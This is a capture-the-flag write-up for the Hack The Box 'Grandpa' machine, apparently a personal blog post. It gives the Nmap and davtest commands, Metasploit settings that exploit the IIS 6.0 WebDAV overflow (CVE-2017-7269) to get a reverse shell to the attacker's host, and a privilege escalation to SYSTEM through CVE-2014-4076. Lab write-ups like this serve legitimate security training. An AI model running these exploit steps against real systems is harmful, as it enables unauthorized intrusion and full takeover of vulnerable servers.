This is a writeup for the retired Hack The Box Grandpa machine.
- Hack The Box Machine address: https://www.hackthebox.com/machines/grandpa
- Machine IP: 10.10.10.14
- Time Required: 1 h
Solution summary
The Grandpa machine is an old Windows system with Microsoft IIS 6.0
running on it
Exploit these two vulnerabilities to get the user and root flag:
- CVE-2017-7269, WebDAV buffer overflow: https://nvd.nist.gov/vuln/detail/cve-2017-7269
- CVE-2014-4076, TCP Input Output Control (IOCTL) privilege escalation: https://nvd.nist.gov/vuln/detail/CVE-2014-4076
Chaining the exploits needed for these two vulnerabilities is difficult. I recommend solving this machine using Metasploit to save yourself time that you can spend on other machines instead.
Solution
These are the steps needed to solve this machine:
- Map out the machine with Nmap and find exposed Microsoft IIS 6.0 with WebDAV.
- Find WebDAV vulnerabilities.
- Exploit WebDAV buffer overflow with Metasploit
iis_webdav_scstoragepathfromurlexploit module. - Post-exploit, leverage TCP IOCTL privilege escalation Metasploit module
ms14_070_tcpip_ioctlto becomeNT AUTHORITY\SYSTEM. - Read out the flags.
Nmap
First, identify the exposed services on this machine:
nmap -sV -sC -A -oX machines/grandpa/nmap.xml 10.10.10.14
The results are:
Starting Nmap 7.94 ( https://nmap.org ) at 2024-09-10 08:43 JST
Nmap scan report for 10.10.10.14
Host is up (0.083s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
|_http-server-header: Microsoft-IIS/6.0
| http-methods:
|_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
| http-webdav-scan:
| WebDAV type: Unknown
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
| Server Date: Mon, 09 Sep 2024 23:33:42 GMT
|_ Server Type: Microsoft-IIS/6.0
|_http-title: Under Construction
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.49 seconds
Findings:
Here are two things that stick out:
- Old Microsoft Internet Information Services (ISS) 6.0 web server running on TCP/80
- Same possible WebDAV vulnerability as in the
Grannymachine solved before.
WebDAV
The landing page doesn’t offer anything interesting Open in new tab (full image size 43 KiB)
To test whether arbitrary file uploads work in WebDAV, use the following davtest
command:
davtest.pl -url http://10.10.10.14
davtest fails to upload any files and prints the following:
********************************************************
Testing DAV connection
OPEN SUCCEED: http://10.10.10.14
********************************************************
NOTE Random string for this session: uj5EWcwWxxc9q
********************************************************
Creating directory
MKCOL FAIL
********************************************************
Sending test files
PUT asp FAIL
PUT shtml FAIL
PUT pl FAIL
PUT cfm FAIL
PUT txt FAIL
PUT html FAIL
PUT aspx FAIL
PUT jhtml FAIL
PUT php FAIL
PUT cgi FAIL
PUT jsp FAIL
********************************************************
Metasploit
Since the davtest.pl based exploit didn’t work, move on and try exploiting
the next vulnerability,
CVE-2017-7269.
Exploiting CVE-2017-7269 is
a bit tricky to pull of. Use Metasploit and save yourself a lot of heartache.
Run the following commands in msfconsole to run the exploit code and gain
reverse shell on the machine:
use exploit/windows/iis/iis_webdav_scstoragepathfromurl
set rhosts 10.10.10.14
set lhost 10.10.16.6
set lport 4444
run
Inside Meterpreter, migrate to another process and put Meterpreter in the background.
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
[...]
1956 584 wmiprvse.exe x86 0 NT AUTHORITY\NETWORK C:\WINDOWS\system32\
SERVICE wbem\wmiprvse.exe
2096 392 vssvc.exe
2160 1484 w3wp.exe x86 0 NT AUTHORITY\NETWORK c:\windows\system32\
SERVICE inetsrv\w3wp.exe
2228 584 davcdata.exe x86 0 NT AUTHORITY\NETWORK C:\WINDOWS\system32\
SERVICE inetsrv\davcdata.exe
[...]
meterpreter > migrate 2160
[*] Migrating from 2280 to 2160...
[*] Migration completed successfully.
meterpreter > background
With Meterpreter in the background, prepare exploiting the next vulnerability to gain system authority in the next section.
Privilege escalation
The Meterpreter session is now running in the background. Use the
TCP IOCTL exploit
(CVE-2014-4076)
and become system user. This is the same exploit
that solved
the Granny
machine before. Run the following:
use exploit/windows/local/ms14_070_tcpip_ioctl
set SESSION 1
exploit
sessions -i 1
This upgrades the session and you become NT AUTHORITY\SYSTEM. Run getuid
to verify your current username.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Retrieving the flags
To search for the flag files on this machine you can use
the search command in Meterpreter:
meterpreter > search -d "C:/Documents and Settings" -f *.txt
Found 14 results...
===================
Path Size (bytes) Modified (UTC)
---- ------------ --------------
C:\Documents and Settings\Administrator\Desktop\root.txt 32 2017-04-12 23:29:33 +0900
[...]
C:\Documents and Settings\Harry\Desktop\user.txt 32 2017-04-12 23:32:26 +0900
[...]
Print out the flags using the cat command:
meterpreter > cat 'C:\Documents and Settings\Administrator\Desktop\root.txt'
meterpreter > cat 'C:\Documents and Settings\Harry\Desktop\user.txt'
The flags are:
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX